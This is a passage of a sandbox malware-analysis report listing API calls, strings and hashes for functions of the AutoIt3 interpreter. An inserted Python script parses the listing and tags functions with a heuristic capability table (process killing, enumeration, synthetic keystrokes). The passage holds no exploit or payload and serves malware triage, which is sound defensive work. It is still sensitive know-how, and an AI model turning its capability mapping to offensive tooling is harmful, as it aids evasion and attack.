                                      • Instruction Fuzzy Hash: 0111E1B1950218BEFA106FA49C8AF6A7B2DFB4C751F10041AF750AB0D1CAF35C509EA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085915A,00000B00,?,?), ref: 008594E2
                                      • HeapAlloc.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 008594E9
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0085915A,00000B00,?,?), ref: 008594FE
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0085915A,00000B00,?,?), ref: 00859506
                                      • DuplicateHandle.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 00859509
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0085915A,00000B00,?,?), ref: 00859519
                                      • GetCurrentProcess.KERNEL32(0085915A,00000000,?,0085915A,00000B00,?,?), ref: 00859521
                                      • DuplicateHandle.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 00859524
                                      • CreateThread.KERNEL32(00000000,00000000,0085954A,00000000,00000000,00000000), ref: 0085953E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 242e52998f03cff5acf3e5639070366d65d2f92955c6c02e761c52fe47de0c9f
                                      • Instruction ID: c31f034bc4f5fa078728dd6894eeb306c8c0dc93869290bfedfd4f3edb47cbea
                                      • Opcode Fuzzy Hash: 242e52998f03cff5acf3e5639070366d65d2f92955c6c02e761c52fe47de0c9f
                                      • Instruction Fuzzy Hash: 9C01B6B5640308BFEB11ABA5DC4DF6B7BACFB89711F048412FA05DB2A1DA749804CF24
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 941cf07e048e35c8096bdc5668ff1aa6a94799937bfe6a74e0b03eb30e0ce394
                                      • Instruction ID: 769051235eb4edfbfaabecc2866f536d06d5c8b43ad994662562b59f9c69746a
                                      • Opcode Fuzzy Hash: 941cf07e048e35c8096bdc5668ff1aa6a94799937bfe6a74e0b03eb30e0ce394
                                      • Instruction Fuzzy Hash: 7AC1B371A0021A9FDF18DF98C884AAEB7F5FB88314F14C469E919E7285E770DD44CB91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      • Opcode ID: 61ad05635038945273f84b837ce5190fed4247d898732d4dccde87baef98f2bd
                                      • Instruction ID: 9e275b5418534080243b6601c1f27a5dcfa889ed5b9272d811ba798661ff27b1
                                      • Opcode Fuzzy Hash: 61ad05635038945273f84b837ce5190fed4247d898732d4dccde87baef98f2bd
                                      • Instruction Fuzzy Hash: 2F918B71A00229AFDF20CFA5C844FAEBBB8FF45724F108559E659EB285D770D944CBA0
                                      APIs
                                        • Part of subcall function 00857D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?,?,00858073), ref: 00857D45
                                        • Part of subcall function 00857D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D60
                                        • Part of subcall function 00857D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?,?), ref: 00857D6E
                                        • Part of subcall function 00857D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857C62,80070057,?), ref: 00857D7E
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00879EF0
                                      • _memset.LIBCMT ref: 00879EFD
                                      • _memset.LIBCMT ref: 0087A040
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0087A06C
                                      • CoTaskMemFree.OLE32(?), ref: 0087A077
                                      Strings
                                      • NULL Pointer assignment, xrefs: 0087A0C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: 02c0214c1b4a5f822a38abd330a033516af1d6f3f35755bca0ebb98a6bcb3efb
                                      • Instruction ID: 3490bfe23f549889e24bf303afb530edfa59b308ae4b44b600559dea801e367c
                                      • Opcode Fuzzy Hash: 02c0214c1b4a5f822a38abd330a033516af1d6f3f35755bca0ebb98a6bcb3efb
                                      • Instruction Fuzzy Hash: 6F913571D00229EBDB10DFA4D844ADEBBB9FF08310F10812AF519E7291DB719A44CFA1
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00887449
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 0088745D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00887477
                                      • _wcscat.LIBCMT ref: 008874D2
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 008874E9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00887517
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: f0e63b5278fad29a636eb27fd79aa1a1052bfed58f2c66659646a00aeb9d50ca
                                      • Instruction ID: 4373d6d016de037fa08bb52c746696af318f78953fdb2e902d5e9893663b28c0
                                      • Opcode Fuzzy Hash: f0e63b5278fad29a636eb27fd79aa1a1052bfed58f2c66659646a00aeb9d50ca
                                      • Instruction Fuzzy Hash: 01419F71A04348AFEB21AF64CC85BEA7BB8FF48354F10442AF984E7291D771DD849B50
                                      APIs
                                        • Part of subcall function 00864148: CreateToolhelp32Snapshot.KERNEL32 ref: 0086416D
                                        • Part of subcall function 00864148: Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
                                        • Part of subcall function 00864148: CloseHandle.KERNEL32(00000000), ref: 00864245
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F08D
                                      • GetLastError.KERNEL32 ref: 0087F0A0
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F0CF
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0087F14C
                                      • GetLastError.KERNEL32(00000000), ref: 0087F157
                                      • CloseHandle.KERNEL32(00000000), ref: 0087F18C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: fac86a9a541986ccd13db05c5cfb949043b1c68fe8ba50c313f1ab0b61ace7ce
                                      • Instruction ID: b84eb3904284ebd159656f88c2209c1deebde510d63370c22b7fdcc58b750ab0
                                      • Opcode Fuzzy Hash: fac86a9a541986ccd13db05c5cfb949043b1c68fe8ba50c313f1ab0b61ace7ce
                                      • Instruction Fuzzy Hash: 62419871240201DFDB12EF29CC95B69B7A5FF80714F488019FA4A9B292CB74E804CB96
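                                      Triage aid, added here as example code (it is not part of the Joe Sandbox report and not code from the AutoIt3 binary the listing describes): the script below parses per-function blocks in the exact format rendered above (the "APIs" lines with their `ref:` addresses, the "String ID:" field, the "Opcode ID" and the closing "Instruction Fuzzy Hash") into structured records and tags each function with coarse capability labels. The rule table and label names are my own assumptions, not Joe Sandbox signatures. The embedded sample is a constructed excerpt of two blocks from this listing (the OpenProcess/TerminateProcess function that carries the SeDebugPrivilege string, and the DuplicateHandle/CreateThread function), with the Memory Dump Source lines left out. Caveat for anyone reading such tags: the snapshot file name (hcaresult_3_2_800000_Autoit3.jbxd) shows these functions belong to the AutoIt3 interpreter image mapped at 0x800000 in process 3, so a tag says what the interpreter can do on behalf of a script, not which of those paths this sample's script actually exercised; that question is answered by the report's behavioural signatures, not by this static listing.

```python
"""Parse Joe Sandbox per-function API listings and tag functions for triage."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# One API line of the listing, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F08D
#   • GetLastError.KERNEL32 ref: 0087F0A0
#   • Part of subcall function 00864148: Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address as an integer
    via_subcall: Optional[str]  # callee address when the API is reached through a subcall


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # from the "String ID:" field
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    def api_names(self) -> Set[str]:
        return {a.name for a in self.apis}


def parse_blocks(text: str) -> List[FunctionBlock]:
    """The Instruction Fuzzy Hash line is the last field of every block, so it
    closes the current record; header-only lines ("APIs", "Strings") are skipped."""
    blocks: List[FunctionBlock] = []
    cur = FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), m.group("sub")))
        elif line.startswith("• String ID:"):
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks


# Heuristic rule table (an assumption of this example, not a Joe Sandbox
# signature set): a block gets a label when it contains every API in the set.
CAPABILITIES: Dict[str, Set[str]] = {
    "process-kill": {"OpenProcess", "TerminateProcess"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW"},
    "process-spawn": {"CreateProcessW"},
    "thread-creation": {"CreateThread"},
    "synthetic-keystrokes": {"AttachThreadInput", "PostMessageW"},
    "com-instantiation": {"CoCreateInstanceEx"},
}


def tag_capabilities(block: FunctionBlock) -> List[str]:
    names = block.api_names()
    tags = [cap for cap, needed in CAPABILITIES.items() if needed <= names]
    if "SeDebugPrivilege" in block.strings:
        tags.append("debug-privilege-string")
    return sorted(tags)


def summarize(text: str) -> Dict[str, List[str]]:
    """Map each tagged block's Opcode ID to its capability tags."""
    return {b.opcode_id: tag_capabilities(b) for b in parse_blocks(text) if tag_capabilities(b)}


# Constructed sample: two blocks copied from the listing, Memory Dump Source lines omitted.
SAMPLE = """\
APIs
  • Part of subcall function 00864148: CreateToolhelp32Snapshot.KERNEL32 ref: 0086416D
  • Part of subcall function 00864148: Process32FirstW.KERNEL32(00000000,?), ref: 0086417B
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0087F08D
• GetLastError.KERNEL32 ref: 0087F0A0
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0087F14C
• CloseHandle.KERNEL32(00000000), ref: 0087F18C
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• Opcode ID: fac86a9a541986ccd13db05c5cfb949043b1c68fe8ba50c313f1ab0b61ace7ce
• Instruction Fuzzy Hash: 62419871240201DFDB12EF29CC95B69B7A5FF80714F488019FA4A9B292CB74E804CB96
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0085915A,00000B00,?,?), ref: 008594E2
• DuplicateHandle.KERNEL32(00000000,?,0085915A,00000B00,?,?), ref: 00859509
• CreateThread.KERNEL32(00000000,00000000,0085954A,00000000,00000000,00000000), ref: 0085953E
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• Opcode ID: 242e52998f03cff5acf3e5639070366d65d2f92955c6c02e761c52fe47de0c9f
• Instruction Fuzzy Hash: 9C01B6B5640308BFEB11ABA5DC4DF6B7BACFB89711F048412FA05DB2A1DA749804CF24
"""
```

`summarize(SAMPLE)` keys the two blocks by Opcode ID and yields `["debug-privilege-string", "process-enumeration", "process-kill"]` for the first and `["thread-creation"]` for the second. Subcall lines are kept with the callee address so a block's tag can be traced to the helper that actually issues the call (here 00864148 for the Toolhelp32 enumeration); the Opcode ID is the stable key to use when the same AutoIt3 build shows up in other reports, since the fuzzy hashes are meant for similarity search rather than exact matching.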
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00850C5B
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • _memset.LIBCMT ref: 00815787
                                      • _wcscpy.LIBCMT ref: 008157DB
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008157EB
                                      • __swprintf.LIBCMT ref: 00850CD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                      • String ID: Line %d: $AutoIt -
                                      • API String ID: 230667853-4094128768
                                      • Opcode ID: bff3a7b25caaa9900d5525d1e2a51c2f6764fbcd815bdc5f99d94436c6f02a2d
                                      • Instruction ID: f7725ec46879c6ef909128913fe69f3dce4b988a86b5a3455e2a0e99af2e0034
                                      • Opcode Fuzzy Hash: bff3a7b25caaa9900d5525d1e2a51c2f6764fbcd815bdc5f99d94436c6f02a2d
                                      • Instruction Fuzzy Hash: 5641A171008304AAD721EB68DC8AEDF77ECFF84354F000A1AF595D21A1EB749688CB97
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 0086357C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: f6768eef91994c39761227a75decab587714cd7b1f4106e51714b6fd9b09d45f
                                      • Instruction ID: 0670c5d3226b9cd9a686bdab0c5de67071ffe97536980963c7d26de561a12307
                                      • Opcode Fuzzy Hash: f6768eef91994c39761227a75decab587714cd7b1f4106e51714b6fd9b09d45f
                                      • Instruction Fuzzy Hash: 3B113A31608366BEE7005A18EC96CAA779CFF05364B20002BFA11E7381E7B86F4046A1
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00864802
                                      • LoadStringW.USER32(00000000), ref: 00864809
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0086481F
                                      • LoadStringW.USER32(00000000), ref: 00864826
                                      • _wprintf.LIBCMT ref: 0086484C
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0086486A
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00864847
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: b8f755f46a6c0561791d62caab4edebb2528f057d2bea8ecc3754690f4845504
                                      • Instruction ID: 0d9a6a6c285568f9a18f0171c8dada9554df6d1f936bfc01c24e6b17ca0839dd
                                      • Opcode Fuzzy Hash: b8f755f46a6c0561791d62caab4edebb2528f057d2bea8ecc3754690f4845504
                                      • Instruction Fuzzy Hash: 780162F69003087FE751A7A49D89EFA776CFB48300F4405A6BB49E2141EB749E844F75
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetSystemMetrics.USER32(0000000F), ref: 0088DB42
                                      • GetSystemMetrics.USER32(0000000F), ref: 0088DB62
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0088DD9D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0088DDBB
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0088DDDC
                                      • ShowWindow.USER32(00000003,00000000), ref: 0088DDFB
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088DE20
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0088DE43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      • Opcode ID: 956744e9ca34f22c4eac24539fc73b5c8c114d8f4689c4f8209220ce069e80ca
                                      • Instruction ID: 7480ab248bf70d8afbc6245b2ff2f7f1b7d3767aab5da71e29a7946a246cf173
                                      • Opcode Fuzzy Hash: 956744e9ca34f22c4eac24539fc73b5c8c114d8f4689c4f8209220ce069e80ca
                                      • Instruction Fuzzy Hash: 78B17831600219EFDF14EF69C985BAD7BB2FF04711F08806AED48EE295D775A950CBA0
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088044E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3479070676-0
                                      • Opcode ID: 6d2ace875fb7f4c2586e688847f20ed744df9308ce334b19905e7063b0b1cc1c
                                      • Instruction ID: 6b786ec0433abd62ead262b1ad4581561a67f80248d5d9286d34fddc7b55d295
                                      • Opcode Fuzzy Hash: 6d2ace875fb7f4c2586e688847f20ed744df9308ce334b19905e7063b0b1cc1c
                                      • Instruction Fuzzy Hash: 96A146702042059FCB50EF68C885B6AB7E5FF84314F14891DF9969B2A2DB31E949CF46
                                      APIs
                                      • ShowWindow.USER32(00000000,?,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 00802E9F
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000,000000FF), ref: 00802EE7
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 0083C55B
                                      • ShowWindow.USER32(00000000,?,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 0083C5C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: fd142fe356b9600e661d3eaf7af5f129659b2575478d41387f2f6552543cde81
                                      • Instruction ID: 654f84965a2ec0e76870d4af7ee7f2d327e576511df6d6532f7448406bbfc431
                                      • Opcode Fuzzy Hash: fd142fe356b9600e661d3eaf7af5f129659b2575478d41387f2f6552543cde81
                                      • Instruction Fuzzy Hash: CD41D931644684AECBB6AB28CC8CB6B7B92FBD5314F28441EE447D65E2C7F1B840DB51
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00867698
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008676CF
                                      • EnterCriticalSection.KERNEL32(?), ref: 008676EB
                                      • _memmove.LIBCMT ref: 00867739
                                      • _memmove.LIBCMT ref: 00867756
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00867765
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0086777A
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00867799
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
